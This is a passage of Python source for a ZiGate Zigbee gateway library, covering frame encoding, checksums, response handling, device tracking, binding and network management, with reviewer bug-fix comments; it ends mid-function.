            groups[k] = set([tuple(r) for r in v])
        self._groups = groups
        self._scenes = data.get('scenes', {})
        self._led = data.get('led', True)
        self._neighbours_table_cache = data.get('neighbours_table', [])
        LOGGER.debug('Load neighbours cache: %s', self._neighbours_table_cache)
        devices = data.get('devices', [])
        # A single bad device entry is logged and skipped, not fatal
        for data in devices:
            try:
                device = Device.from_json(data, self)
                self._devices[device.addr] = device
                device._create_actions()
            except Exception:
                LOGGER.error('Error loading device %s', data)
        LOGGER.debug('Load success')
        return True
    except Exception:
        LOGGER.error('Failed to load persistent file %s', self._path)
        LOGGER.error(traceback.format_exc())
    LOGGER.debug('No file to load')
    return False
def start_auto_save(self):
    '''
    Save state now and re-arm a timer so state is saved every AUTO_SAVE
    seconds; also pings the ZiGate and reconnects if it stopped answering.
    '''
    LOGGER.debug('Auto saving %s', self._path)
    self.save_state()
    self._autosavetimer = threading.Timer(AUTO_SAVE, self.start_auto_save)
    self._autosavetimer.daemon = True  # setDaemon() is deprecated
    self._autosavetimer.start()
    # check if we're still connected to zigate
    if self.send_data(0x0010) is None:
        # FIX: connection may be None (never connected / already closed);
        # calling reconnect() on it would crash the timer thread
        if self.connection:
            self.connection.reconnect()
def __del__(self):
    # Best-effort cleanup; close() is idempotent
    self.close()
def _start_event_thread(self):
    '''Spawn the daemon thread that runs _event_loop().'''
    # daemon=True replaces the deprecated setDaemon() call
    self._event_thread = threading.Thread(target=self._event_loop,
                                          name='ZiGate-Event Loop',
                                          daemon=True)
    self._event_thread.start()
def autoStart(self, channel=None):
    # Backward-compatible alias for startup()
    self.startup(channel)
def startup(self, channel=None):
    '''
    Startup sequence:
    - Load persistent file
    - setup connection
    - Set Channel mask
    - Set Type Coordinator
    - Start Network
    - Refresh devices list
    '''
    if self._started:
        return
    self._closing = False
    self._start_event_thread()
    self.load_state()
    self.setup_connection()
    self.set_led(self._led)
    version = self.get_version()
    self.set_channel(channel)
    self.set_type(TYPE_COORDINATOR)
    LOGGER.debug('Check network state')
    # self.start_network()
    network_state = self.get_network_state()
    if not network_state:
        LOGGER.error('Failed to get network state')
    # extended_panid == 0 or addr == 'ffff' means no network is formed yet
    if not network_state or network_state.get('extended_panid') == 0 or \
            network_state.get('addr') == 'ffff':
        LOGGER.debug('Network is down, start it')
        self.start_network(True)
        # Network formation can take a moment: poll up to 3 times
        tries = 3
        while tries > 0:
            sleep(1)
            tries -= 1
            network_state = self.get_network_state()
            if network_state and \
                    network_state.get('extended_panid') != 0 and \
                    network_state.get('addr') != 'ffff':
                break
        if tries <= 0:
            LOGGER.error('Failed to start network')
            self.reset()
            return
    # NOTE(review): firmware versions are compared as strings — works for
    # the current 'N.Nx' scheme, confirm before relying on it
    if version and version['version'] >= '3.1a':
        LOGGER.debug('Set Zigate normal mode (firmware >= 3.1a)')
        self.set_raw_mode(False)
    if version and version['version'] >= '3.0f':
        LOGGER.debug('Set Zigate Time (firmware >= 3.0f)')
        self.set_time()
    self.get_devices_list(True)
    t = threading.Thread(target=self.need_discovery)
    t.setDaemon(True)
    t.start()
    # self.need_discovery()
def need_discovery(self):
    '''
    scan device which need discovery
    auto discovery if possible
    else dispatch signal

    Sleepy (battery) devices cannot be queried while idle, so for them a
    ZIGATE_DEVICE_NEED_DISCOVERY signal is emitted instead.
    '''
    for device in self.devices:
        if device.need_discovery():
            if device.receiver_on_when_idle():
                LOGGER.debug('Auto discover device %s', device)
                device.discover_device()
            else:
                dispatch_signal(ZIGATE_DEVICE_NEED_DISCOVERY,
                                self, **{'zigate': self,
                                         'device': device})
def zigate_encode(self, data):
    '''
    Apply ZiGate transparency encoding: any byte below 0x10 is escaped
    as 0x02 followed by (byte XOR 0x10). Returns a bytearray.
    '''
    out = bytearray()
    for byte in data:
        if byte >= 0x10:
            out.append(byte)
        else:
            out.extend((0x02, byte ^ 0x10))
    return out
def zigate_decode(self, data):
    '''
    Reverse zigate_encode(): a 0x02 escape byte causes the following
    byte to be XOR-ed with 0x10. Returns a bytearray.
    '''
    out = bytearray()
    escape_next = False
    for byte in data:
        if escape_next:
            escape_next = False
            out.append(byte ^ 0x10)
        elif byte == 0x02:
            escape_next = True
        else:
            out.append(byte)
    return out
def checksum(self, *args):
    '''
    XOR checksum over all arguments: ints are folded in directly,
    byte sequences are folded byte by byte.
    '''
    total = 0
    for arg in args:
        if isinstance(arg, int):
            total ^= arg
        else:
            for byte in arg:
                total ^= byte
    return total
def send_to_transport(self, data):
    '''Low-level write: drops the frame (with an error log) when no
    transport is connected.'''
    if not self.connection or not self.connection.is_connected():
        LOGGER.error('Not connected to zigate')
        return
    self.connection.send(data)
def send_data(self, cmd, data="", wait_response=None, wait_status=True):
    '''
    send data through ZiGate

    :param cmd: command id as int, hex string, or pre-packed 2-byte value
    :param data: payload as bytes or hex string
    :param wait_response: message type (int) to wait for and return
    :param wait_status: wait for the 0x8000 status message
    :return: awaited response, status, or False when not waiting
    '''
    # BUG FIX: the original tested `isinstance(data, str)` when deciding
    # how to convert `cmd`, so a str/bytes cmd was mishandled; normalize
    # cmd to an int up front so logging, _last_status keying and packing
    # all agree.
    if isinstance(cmd, str):
        cmd = int(cmd, 16)
    elif not isinstance(cmd, int):
        cmd = struct.unpack('!H', cmd)[0]
    LOGGER.debug('REQUEST : 0x{:04x} {}'.format(cmd, data))
    self._last_status[cmd] = None
    if wait_response:
        self._clear_response(wait_response)
    byte_cmd = struct.pack('!H', cmd)
    if isinstance(data, str):
        byte_data = bytes.fromhex(data)
    else:
        byte_data = data
    assert type(byte_data) == bytes
    length = len(byte_data)
    byte_length = struct.pack('!H', length)
    # checksum covers command, length and payload
    checksum = self.checksum(byte_cmd, byte_length, byte_data)
    msg = struct.pack('!HHB%ds' % length, cmd, length, checksum, byte_data)
    LOGGER.debug('Msg to send %s', hexlify(msg))
    # escape, then frame with 0x01 ... 0x03 markers
    enc_msg = self.zigate_encode(msg)
    enc_msg.insert(0, 0x01)
    enc_msg.append(0x03)
    encoded_output = bytes(enc_msg)
    LOGGER.debug('Encoded Msg to send %s', hexlify(encoded_output))
    self.send_to_transport(encoded_output)
    if wait_status:
        status = self._wait_status(cmd)
        if wait_response and status is not None:
            r = self._wait_response(wait_response)
            return r
        return status
    return False
def decode_data(self, packet):
    '''
    Decode raw packet message

    After stripping the 0x01/0x03 frame markers and un-escaping, the
    frame layout is !HHB<payload>B: msg_type, length, checksum, value, lqi.
    '''
    try:
        decoded = self.zigate_decode(packet[1:-1])
        msg_type, length, checksum, value, lqi = \
            struct.unpack('!HHB%dsB' % (len(decoded) - 6), decoded)
    except Exception:
        LOGGER.error('Failed to decode packet : %s', hexlify(packet))
        return
    if length != len(value) + 1:  # add lqi length
        LOGGER.error('Bad length %s != %s : %s', length, len(value) + 1, value)
        return
    # checksum covers header (first 4 bytes), lqi and payload
    computed_checksum = self.checksum(decoded[:4], lqi, value)
    if checksum != computed_checksum:
        LOGGER.error('Bad checksum %s != %s', checksum, computed_checksum)
        return
    LOGGER.debug('Received response 0x{:04x}: {}'.format(msg_type, hexlify(value)))
    try:
        # Fall back to the generic Response class for unknown types
        response = RESPONSES.get(msg_type, Response)(value, lqi)
    except Exception:
        LOGGER.error('Error decoding response 0x{:04x}: {}'.format(msg_type, hexlify(value)))
        LOGGER.error(traceback.format_exc())
        return
    if msg_type != response.msg:
        LOGGER.warning('Unknown response 0x{:04x}'.format(msg_type))
    LOGGER.debug(response)
    self._last_response[msg_type] = response
    self.interpret_response(response)
    dispatch_signal(ZIGATE_RESPONSE_RECEIVED, self, response=response)
def interpret_response(self, response):
    '''
    Update internal state and dispatch signals according to the decoded
    *response* message type.
    '''
    if response.msg == 0x8000:  # status
        if response['status'] != 0:
            LOGGER.error('Command 0x{:04x} failed {} : {}'.format(response['packet_type'],
                                                                  response.status_text(),
                                                                  response['error']))
        # unblock _wait_status() for the originating command
        self._last_status[response['packet_type']] = response
    elif response.msg == 0x8011:  # APS_DATA_ACK
        if response['status'] != 0:
            LOGGER.error('Device {} doesn\'t receive last command to '
                         'endpoint {} cluster {}: 0x{:02x}'.format(response['addr'],
                                                                   response['endpoint'],
                                                                   response['cluster'],
                                                                   response['status']))
    elif response.msg == 0x8007:  # factory reset
        if response['status'] == 0:
            self._devices = {}
            self.start_network()
    elif response.msg == 0x8015:  # device list
        keys = set(self._devices.keys())
        known_addr = set([d['addr'] for d in response['devices']])
        LOGGER.debug('Known devices in zigate : %s', known_addr)
        missing = keys.difference(known_addr)
        LOGGER.debug('Previous devices missing : %s', missing)
        for addr in missing:
            self._tag_missing(addr)
            # self._remove_device(addr)
        for d in response['devices']:
            # all-zero IEEE means an empty slot
            if d['ieee'] == '0000000000000000':
                continue
            device = Device(dict(d), self)
            self._set_device(device)
    elif response.msg == 0x8035:  # PDM event
        LOGGER.warning('PDM Event : %s %s', response['status'], response.status_text())
    elif response.msg == 0x8042:  # node descriptor
        addr = response['addr']
        d = self.get_device_from_addr(addr)
        if d:
            d.update_info(response.cleaned_data())
            self.discover_device(addr)
    elif response.msg == 0x8043:  # simple descriptor
        addr = response['addr']
        endpoint = response['endpoint']
        d = self.get_device_from_addr(addr)
        if d:
            ep = d.get_endpoint(endpoint)
            ep.update(response.cleaned_data())
            ep['in_clusters'] = response['in_clusters']
            ep['out_clusters'] = response['out_clusters']
            self.discover_device(addr)
            d._create_actions()
    elif response.msg == 0x8045:  # endpoint list
        addr = response['addr']
        d = self.get_device_from_addr(addr)
        if d:
            for endpoint in response['endpoints']:
                ep = d.get_endpoint(endpoint['endpoint'])
                self.simple_descriptor_request(addr, endpoint['endpoint'])
            self.discover_device(addr)
    elif response.msg == 0x8048:  # leave
        device = self.get_device_from_ieee(response['ieee'])
        if device:
            if response['rejoin_status'] == 1:
                # device intends to come back: keep it, mark missing
                device.missing = True
            else:
                self._remove_device(device.addr)
    elif response.msg == 0x8062:  # Get group membership response
        data = response.cleaned_data()
        self._sync_group_membership(data['addr'], data['endpoint'], data['groups'])
    elif response.msg in (0x8100, 0x8102, 0x8110, 0x8401,
                          0x8085, 0x8095, 0x80A7):  # attribute report or IAS Zone status change
        if response.get('status', 0) != 0:
            LOGGER.debug('Received Bad status')
            # handle special case, no model identifier
            if response['status'] == 0x86 and response['cluster'] == 0 and response['attribute'] == 5:
                response['data'] = 'unsupported'
            else:
                return
        # ignore if related to zigate
        if response['addr'] == self.addr:
            return
        device = self._get_device(response['addr'])
        device.lqi = response['lqi']
        device.set_attribute(response['endpoint'],
                             response['cluster'],
                             response.cleaned_data())
    elif response.msg == 0x004D:  # device announce
        LOGGER.debug('Device Announce %s', response)
        device = Device(response.data, self)
        self._set_device(device)
    elif response.msg == 0x8140:  # attribute discovery
        if 'addr' in response:
            # ignore if related to zigate
            if response['addr'] == self.addr:
                return
            device = self._get_device(response['addr'])
            device.set_attribute(response['endpoint'],
                                 response['cluster'],
                                 response.cleaned_data())
    elif response.msg == 0x8501:  # OTA image block request
        LOGGER.debug('Client is requesting ota image data')
        self._ota_send_image_data(response)
    elif response.msg == 0x8503:  # OTA Upgrade end request
        LOGGER.debug('Client ended ota process')
        self._ota_handle_upgrade_end_request(response)
    elif response.msg == 0x8702:  # APS Data confirm Fail
        LOGGER.warning(response)
    # else:
    #     LOGGER.debug('Do nothing special for response {}'.format(response))
def _get_device(self, addr):
    '''
    get device from addr
    create it if necessary

    An unknown addr yields a placeholder Device and triggers a device-list
    refresh so the real info arrives later.
    '''
    d = self.get_device_from_addr(addr)
    if not d:
        LOGGER.warning('Device not found, create it (this isn\'t normal)')
        d = Device({'addr': addr}, self)
        self._set_device(d)
        self.get_devices_list()  # since device is missing, request info
    return d
def _tag_missing(self, addr):
    '''
    tag a device as missing

    Only devices not seen for more than 24h are marked; last_seen is
    compared as a '%Y-%m-%d %H:%M:%S' string, which sorts chronologically.
    '''
    last_24h = datetime.datetime.now() - datetime.timedelta(hours=24)
    last_24h = last_24h.strftime('%Y-%m-%d %H:%M:%S')
    if addr in self._devices:
        if self._devices[addr].last_seen and self._devices[addr].last_seen < last_24h:
            self._devices[addr].missing = True
            LOGGER.warning('The device %s is missing', addr)
            dispatch_signal(ZIGATE_DEVICE_UPDATED,
                            self, **{'zigate': self,
                                     'device': self._devices[addr]})
def get_missing(self):
    '''
    return missing devices
    '''
    missing = []
    for device in self._devices.values():
        if device.missing:
            missing.append(device)
    return missing
def cleanup_devices(self):
    '''
    remove devices tagged missing
    '''
    # snapshot the addresses first: _remove_device mutates self._devices
    doomed = [device.addr for device in self.get_missing()]
    for addr in doomed:
        self._remove_device(addr)
def _remove_device(self, addr):
    '''
    remove device from addr

    NOTE(review): unlike sibling dispatches, no sender (self) is passed
    here, so the signal goes out with the Anonymous sender — confirm
    receivers don't filter on sender.
    '''
    device = self._devices.pop(addr)
    dispatch_signal(ZIGATE_DEVICE_REMOVED, **{'zigate': self,
                                              'addr': addr,
                                              'device': device})
def _set_device(self, device):
    '''
    add/update device to cache list

    Three cases: known addr -> merge; same IEEE under a different addr ->
    re-key and signal the address change; otherwise -> brand new device.
    '''
    assert type(device) == Device
    if device.addr in self._devices:
        self._devices[device.addr].update(device)
        dispatch_signal(ZIGATE_DEVICE_UPDATED, self, **{'zigate': self,
                                                        'device': self._devices[device.addr]})
    else:
        # check if device already exist with other address
        d = self.get_device_from_ieee(device.ieee)
        if d:
            LOGGER.warning('Device already exists with another addr %s, rename it.', d.addr)
            old_addr = d.addr
            new_addr = device.addr
            d.discovery = ''
            d.update(device)
            self._devices[new_addr] = d
            del self._devices[old_addr]
            dispatch_signal(ZIGATE_DEVICE_ADDRESS_CHANGED, self,
                            **{'zigate': self,
                               'device': d,
                               'old_addr': old_addr,
                               'new_addr': new_addr,
                               })
        else:
            self._devices[device.addr] = device
            dispatch_signal(ZIGATE_DEVICE_ADDED, self, **{'zigate': self,
                                                          'device': device})
            self.discover_device(device.addr)
def get_status_text(self, status_code):
    '''
    Map a ZiGate status code to its descriptive text, falling back to a
    generic message for unknown codes.
    '''
    # BUG FIX: dict.get() accepts at most two arguments; the previous
    # 3-argument call raised TypeError on every lookup. The intent was a
    # formatted fallback string.
    return STATUS_CODES.get(status_code,
                            'Failed with event code: %s' % status_code)
def _clear_response(self, msg_type):
    '''Drop any cached response for *msg_type* so a fresh one can be awaited.'''
    self._last_response.pop(msg_type, None)
def _wait_response(self, msg_type):
    '''
    wait for next msg_type response

    Polls every 10 ms up to WAIT_TIMEOUT seconds; returns the cached
    response, or None on timeout.
    '''
    LOGGER.debug('Waiting for message 0x{:04x}'.format(msg_type))
    t1 = monotonic()
    while self._last_response.get(msg_type) is None:
        sleep(0.01)
        t2 = monotonic()
        if t2 - t1 > WAIT_TIMEOUT:  # no response timeout
            LOGGER.warning('No response waiting command 0x{:04x}'.format(msg_type))
            return
    LOGGER.debug('Stop waiting, got message 0x{:04x}'.format(msg_type))
    return self._last_response.get(msg_type)
def _wait_status(self, cmd):
    '''
    wait for status of cmd

    Polls every 10 ms up to WAIT_TIMEOUT seconds. Consecutive timeouts
    are counted in _no_response_count (used to detect a dead link);
    any success resets the counter.
    '''
    LOGGER.debug('Waiting for status message for command 0x{:04x}'.format(cmd))
    t1 = monotonic()
    while self._last_status.get(cmd) is None:
        sleep(0.01)
        t2 = monotonic()
        if t2 - t1 > WAIT_TIMEOUT:  # no response timeout
            self._no_response_count += 1
            LOGGER.warning('No response after command 0x{:04x} ({})'.format(cmd, self._no_response_count))
            return
    self._no_response_count = 0
    LOGGER.debug('STATUS code to command 0x{:04x}:{}'.format(cmd, self._last_status.get(cmd)))
    return self._last_status.get(cmd)
def __addr(self, addr):
    ''' convert hex string addr to int '''
    return int(addr, 16) if isinstance(addr, str) else addr
def __haddr(self, int_addr, length=4):
    ''' convert int addr to zero-padded hex of the given width '''
    return format(int_addr, '0{}x'.format(length))
@property
def devices(self):
    '''Snapshot list of all known devices.'''
    return [device for device in self._devices.values()]
def get_device_from_addr(self, addr):
    '''Return the known device with the given short address, or None.'''
    try:
        return self._devices[addr]
    except KeyError:
        return None
def get_device_from_ieee(self, ieee):
    '''Return the known device with the given IEEE address, or None
    (also None for a falsy ieee).'''
    if not ieee:
        return None
    return next((dev for dev in self._devices.values() if dev.ieee == ieee),
                None)
def get_devices_list(self, wait=False):
    '''
    refresh device list from zigate

    :param wait: block until the 0x8015 device-list response arrives
    '''
    wait_response = None
    if wait:
        wait_response = 0x8015
    self.send_data(0x0015, wait_response=wait_response)
def set_raw_mode(self, enable=True):
    '''
    Enable or disable ZiGate raw data mode (command 0x0002).

    (Previous docstring was a copy of set_led's.)
    '''
    data = struct.pack('!B', enable)
    return self.send_data(0x0002, data)
def get_version(self, refresh=False):
    '''
    get zigate firmware version

    The result is cached; pass refresh=True to query the hardware again.
    '''
    if not self._version or refresh:
        r = self.send_data(0x0010, wait_response=0x8010)
        if r:
            self._version = r.data
        else:
            LOGGER.warning('Failed to retrieve zigate firmware version')
    return self._version
def get_version_text(self, refresh=False):
    '''
    get zigate firmware version as text (None when unavailable)
    '''
    version = self.get_version(refresh)
    return version['version'] if version else None
def reset(self):
    '''
    reset zigate (command 0x0011); fire-and-forget, no status awaited
    '''
    return self.send_data(0x0011, wait_status=False)
def erase_persistent(self):
    '''
    erase persistent data in zigate (command 0x0012); no status awaited
    '''
    return self.send_data(0x0012, wait_status=False)
def factory_reset(self):
    '''
    ZLO/ZLL "Factory New" Reset (command 0x0013); no status awaited
    '''
    return self.send_data(0x0013, wait_status=False)
def is_permitting_join(self):
    '''
    check if zigate is permitting join

    Returns the 'status' field of the 0x8014 response, or None/False when
    no response arrived.
    '''
    r = self.send_data(0x0014, wait_response=0x8014)
    if r:
        r = r.get('status', False)
    return r
def set_time(self, dt=None):
    '''
    Set internal zigate time
    dt should be datetime.datetime object

    The firmware epoch is 2000-01-01 00:00:00; the current local time is
    used when dt is omitted.
    '''
    dt = dt or datetime.datetime.now()
    # timestamp from 2000-01-01 00:00:00
    timestamp = int((dt - datetime.datetime(2000, 1, 1)).total_seconds())
    data = struct.pack('!L', timestamp)
    self.send_data(0x0016, data)
def get_time(self):
    '''
    get internal zigate time

    Returns a datetime built from the firmware's seconds-since-2000
    counter, or None when no response arrived.
    '''
    r = self.send_data(0x0017, wait_response=0x8017)
    dt = None
    if r:
        timestamp = r.get('timestamp')
        dt = datetime.datetime(2000, 1, 1) + datetime.timedelta(seconds=timestamp)
    return dt
def set_led(self, on=True):
    '''
    Set Blue Led state ON/OFF

    The choice is remembered in self._led so it persists via save_state().
    '''
    self._led = on
    data = struct.pack('!?', on)
    return self.send_data(0x0018, data)
def set_certification(self, standard='CE'):
    '''
    Set Certification CE=1, FCC=2

    :raises KeyError: if standard is neither 'CE' nor 'FCC'
    '''
    cert = {'CE': 1, 'FCC': 2}
    data = struct.pack('!B', cert[standard])
    return self.send_data(0x0019, data)
def permit_join(self, duration=60):
    '''
    start permit join
    duration in secs, 0 means stop permit join

    Target FFFC = broadcast to all routers; trailing 00 = no TC significance.
    '''
    return self.send_data(0x0049, 'FFFC{:02X}00'.format(duration))
def stop_permit_join(self):
    '''
    convenient function to stop permit_join
    '''
    return self.permit_join(0)
def set_extended_panid(self, panid):
    '''
    Set Extended PANID

    :param panid: 64-bit extended PAN id as an int
    '''
    data = struct.pack('!Q', panid)
    return self.send_data(0x0020, data)
def set_channel(self, channels=None):
    '''
    set channel

    :param channels: a channel number or list of them; None selects the
        default preferred-channel mask.
    NOTE(review): the mask is folded with XOR, so a channel listed twice
    would cancel itself out — confirm callers never pass duplicates.
    '''
    channels = channels or [11, 14, 15, 19, 20, 24, 25, 26]
    if not isinstance(channels, list):
        channels = [channels]
    mask = functools.reduce(lambda acc, x: acc ^ 2 ** x, channels, 0)
    mask = struct.pack('!I', mask)
    return self.send_data(0x0021, mask)
def set_type(self, typ=TYPE_COORDINATOR):
    '''
    set zigate mode type

    NOTE(review): unlike sibling setters this does not return the
    send_data() status — confirm whether callers rely on that.
    '''
    data = struct.pack('!B', typ)
    self.send_data(0x0023, data)
def get_network_state(self):
    ''' get network state

    Queries 0x0009/0x8009 and mirrors the addr/ieee/panid/channel fields
    into the instance; returns the cleaned response dict or None.
    '''
    r = self.send_data(0x0009, wait_response=0x8009)
    if r:
        data = r.cleaned_data()
        self._addr = data['addr']
        self._ieee = data['ieee']
        self.panid = data['panid']
        self.extended_panid = data['extended_panid']
        self.channel = data['channel']
        return data
def start_network(self, wait=False):
    ''' start network

    :param wait: block for the 0x8024 "network started" response and,
        when it arrives, mirror addr/ieee/channel into the instance.
    '''
    wait_response = None
    if wait:
        wait_response = 0x8024
    r = self.send_data(0x0024, wait_response=wait_response)
    if wait and r:
        data = r.cleaned_data()
        if 'addr' in data:
            self._addr = data['addr']
            self._ieee = data['ieee']
            self.channel = data['channel']
    return r
def start_network_scan(self):
    ''' start network scan (command 0x0025) '''
    return self.send_data(0x0025)
def remove_device(self, addr, force=False):
    '''
    Remove a device from the network (Mgmt Leave, message 0x0026).

    addr : 4-char hex short address of a known device; silently does
        nothing when the address is unknown.
    force : also drop the device from the local table immediately,
        without waiting for the leave confirmation.
    Returns the send_data result, or None when the device had no IEEE
    address (it is then only removed locally).
    '''
    if addr in self._devices:
        ieee = self._devices[addr].ieee
        if not ieee:
            # a leave request needs the IEEE address; without it we can
            # only forget the device locally
            LOGGER.warning('No ieee for %s, silently removing the device', self._devices[addr])
            self._remove_device(addr)
        else:
            ieee = self.__addr(ieee)
            zigate_ieee = self.__addr(self.ieee)
            data = struct.pack('!QQ', zigate_ieee, ieee)
            if force:
                self._remove_device(addr)
            return self.send_data(0x0026, data)
def remove_device_ieee(self, ieee):
    '''
    Remove a device identified by its IEEE address.

    Does nothing when no device matches the given IEEE address.
    '''
    found = self.get_device_from_ieee(ieee)
    if found:
        self.remove_device(found.addr)
def enable_permissions_controlled_joins(self, enable=True):
    '''
    Enable or disable permissions-controlled joins (message 0x0027).

    The wire value is 1 to enable, 2 to disable.
    '''
    flag = 1 if enable else 2
    return self.send_data(0x0027, struct.pack('!B', flag))
def _choose_addr_mode(self, addr_ieee):
    '''
    Pick the ZiGate address mode and struct format for an address.

    A 4-char value is a 16-bit address: group (1) when it is a known
    group, short (2) when it is a known device, bound (0) otherwise.
    Anything longer is treated as a 64-bit IEEE address (3).
    Returns (addr_mode, struct_format).
    '''
    if len(addr_ieee) != 4:
        # 64-bit IEEE address
        return 3, 'Q'
    if addr_ieee in self._groups:
        mode = 1  # AddrMode.group
    elif addr_ieee in self._devices:
        mode = 2  # AddrMode.short
    else:
        mode = 0  # AddrMode.bound
    return mode, 'H'
def _translate_addr(self, addr_ieee):
    '''
    Return the short address for an IEEE address.

    Values of 4 characters or fewer are assumed to already be short
    addresses and pass through unchanged.
    '''
    if len(addr_ieee) <= 4:
        return addr_ieee
    return self.get_addr(addr_ieee)
def get_addr(self, ieee):
    '''
    Look up the short address of a known device by IEEE address.

    Logs an error and returns None when no device matches.
    '''
    for device in self._devices.values():
        if device.ieee == ieee:
            return device.addr
    LOGGER.error('Failed to retrieve short address for %s', ieee)
def _bind_unbind(self, cmd, ieee, endpoint, cluster,
                 dst_addr=None, dst_endpoint=1):
    '''
    Send a ZDP bind (0x0030) or unbind (0x0031) request.

    cmd : 0x0030 to bind, 0x0031 to unbind.
    ieee : IEEE address of the source device.
    dst_addr : destination (group, short or IEEE address); defaults
        to the ZiGate's own IEEE address.
    Waits for the matching response (cmd | 0x8000).
    '''
    if not dst_addr:
        dst_addr = self.ieee
    addr_mode, addr_fmt = self._choose_addr_mode(dst_addr)
    ieee = self.__addr(ieee)
    dst_addr = self.__addr(dst_addr)
    data = struct.pack('!QBHB' + addr_fmt + 'B', ieee, endpoint,
                       cluster, addr_mode, dst_addr, dst_endpoint)
    # by convention the response message id is the command id + 0x8000
    wait_response = cmd + 0x8000
    return self.send_data(cmd, data, wait_response)
def bind(self, ieee, endpoint, cluster, dst_addr=None, dst_endpoint=1):
    '''
    Bind a cluster of a device to a destination.

    When dst_addr is omitted the binding targets the ZiGate itself.
    '''
    return self._bind_unbind(0x0030, ieee, endpoint, cluster,
                             dst_addr, dst_endpoint)
def bind_addr(self, addr, endpoint, cluster, dst_addr=None,
              dst_endpoint=1):
    '''
    Bind using the short address instead of the IEEE address.

    Convenience wrapper around bind(); logs an error and returns None
    when the address is unknown or the device has no IEEE address.
    '''
    if addr in self._devices:
        ieee = self._devices[addr].ieee
        if ieee:
            return self.bind(ieee, endpoint, cluster, dst_addr, dst_endpoint)
        LOGGER.error('Failed to bind, addr %s, IEEE is missing', addr)
        # fix: stop here instead of falling through and also logging
        # the misleading "addr unknown" message
        return
    LOGGER.error('Failed to bind, addr %s unknown', addr)
def unbind(self, ieee, endpoint, cluster, dst_addr=None, dst_endpoint=1):
    '''
    Unbind a cluster of a device from a destination.

    When dst_addr is omitted the ZiGate itself is assumed.
    '''
    return self._bind_unbind(0x0031, ieee, endpoint, cluster,
                             dst_addr, dst_endpoint)
def unbind_addr(self, addr, endpoint, cluster, dst_addr='0000',
                dst_endpoint=1):
    '''
    Unbind using the short address instead of the IEEE address.

    Convenience wrapper around unbind(); logs an error and returns
    None when the address is unknown or the device has no IEEE
    address.
    '''
    if addr in self._devices:
        # fix: access .ieee like bind_addr/remove_device do, instead
        # of the inconsistent ['ieee'] subscript
        ieee = self._devices[addr].ieee
        if ieee:
            return self.unbind(ieee, endpoint, cluster, dst_addr, dst_endpoint)
        LOGGER.error('Failed to unbind, addr %s, IEEE is missing', addr)
        return
    LOGGER.error('Failed to unbind, addr %s unknown', addr)
def network_address_request(self, ieee):
    '''
    ZDP Network Address request (0x0040): resolve an IEEE address
    to a short address, asking the coordinator (target 0000).

    Returns the short address from the 0x8040 response, or None when
    no response arrived.
    '''
    target_addr = self.__addr('0000')
    ieee = self.__addr(ieee)
    # trailing 0, 0 = single-device request, start index 0
    data = struct.pack('!HQBB', target_addr, ieee, 0, 0)
    r = self.send_data(0x0040, data, wait_response=0x8040)
    if r:
        return r.data['addr']
def ieee_address_request(self, addr):
    '''
    ZDP IEEE Address request (0x0041): resolve a short address to an
    IEEE address, asking the coordinator (target 0000).

    Returns the IEEE address from the 0x8041 response, or None when
    no response arrived.
    '''
    target_addr = self.__addr('0000')
    addr = self.__addr(addr)
    # trailing 0, 0 = single-device request, start index 0
    data = struct.pack('!HHBB', target_addr, addr, 0, 0)
    r = self.send_data(0x0041, data, wait_response=0x8041)
    if r:
        return r.data['ieee']
def node_descriptor_request(self, addr):
    '''
    Request the node descriptor of a device (message 0x0042).
    '''
    return self.send_data(0x0042, addr)
def simple_descriptor_request(self, addr, endpoint):
    '''
    Request the simple descriptor of one endpoint (message 0x0043).

    addr : 4-char hex short address.
    endpoint : endpoint number to describe.
    '''
    addr = self.__addr(addr)
    data = struct.pack('!HB', addr, endpoint)
    return self.send_data(0x0043, data)
def power_descriptor_request(self, addr):
    '''
    Request the power descriptor of a device (message 0x0044).
    '''
    return self.send_data(0x0044, addr)
def active_endpoint_request(self, addr):
    '''
    Request the list of active endpoints of a device (message 0x0045).
    '''
    return self.send_data(0x0045, addr)
def leave_request(self, addr, ieee=None, rejoin=False,
                  remove_children=False):
    '''
    Management Leave request (message 0x0047).

    addr : 4-char hex short address.
    ieee : IEEE address; looked up in the device table when omitted.
    rejoin : 0 do not rejoin, 1 rejoin
    remove_children : 0 Leave, do not remove children
                      1 = Leave, removing children
    '''
    # fix: look the device up BEFORE converting addr - _devices is
    # keyed by the 4-char hex string, not the packed integer, so the
    # original lookup after self.__addr(addr) could never succeed.
    # Also use .ieee for consistency with remove_device/bind_addr.
    if not ieee:
        ieee = self._devices[addr].ieee
    addr = self.__addr(addr)
    ieee = self.__addr(ieee)
    data = struct.pack('!HQBB', addr, ieee, rejoin, remove_children)
    return self.send_data(0x0047, data)
def lqi_request(self, addr='0000', index=0, wait=False):
    '''
    Management LQI request (message 0x004E).

    addr : short address of the node to query (coordinator default).
    index : start index into the node's neighbour table.
    wait : block for the 0x804E response.
    Returns the response object, or None when not waiting/timed out.
    '''
    addr = self.__addr(addr)
    data = struct.pack('!HB', addr, index)
    wait_response = None
    if wait:
        wait_response = 0x804e
    r = self.send_data(0x004e, data, wait_response=wait_response)
    return r
def build_neighbours_table(self, force=False):
    '''
    Return the neighbours table, rebuilding it when forced or when no
    cached copy exists yet.

    Only one build may run at a time; a concurrent call just logs a
    warning and returns the current cache.
    '''
    if force or not self._neighbours_table_cache:
        if self._building_neighbours_table:
            LOGGER.warning('building neighbours table already started')
        else:
            self._building_neighbours_table = True
            try:
                self._neighbours_table_cache = self._neighbours_table()
            finally:
                # always clear the flag, even if the build raised
                self._building_neighbours_table = False
    return self._neighbours_table_cache
def _neighbours_table(self, addr=None, nodes=None):
    '''
    Recursively build the neighbours table starting from addr
    (the ZiGate itself by default).

    nodes accumulates already-visited addresses so routers are not
    walked twice.  Returns a list of (parent, child, lqi) tuples.
    '''
    if addr is None:
        addr = self.addr
    if nodes is None:
        nodes = []
    LOGGER.debug('Search for children of %s', addr)
    nodes.append(addr)
    index = 0
    neighbours = []
    # start high; replaced by the real entry count from the first reply
    entries = 255
    while index < entries:
        r = self.lqi_request(addr, index, True)
        if not r:
            LOGGER.error('Failed to build neighbours table')
            break
        data = r.cleaned_data()
        entries = data['entries']
        for n in data['neighbours']:
            # bit_field
            # bit 0-1 = u2RxOnWhenIdle 0/1
            # bit 2-3 = u2Relationship 0/1/2
            # bit 4-5 = u2PermitJoining 0/1
            # bit 6-7 = u2DeviceType 0/1/2
            is_parent = n['bit_field'][2:4] == '00'
            is_child = n['bit_field'][2:4] == '01'
            is_router = n['bit_field'][6:8] == '01'
            if is_parent:
                neighbours.append((n['addr'], addr, n['lqi']))
            elif is_child:
                neighbours.append((addr, n['addr'], n['lqi']))
            elif n['depth'] == 0:
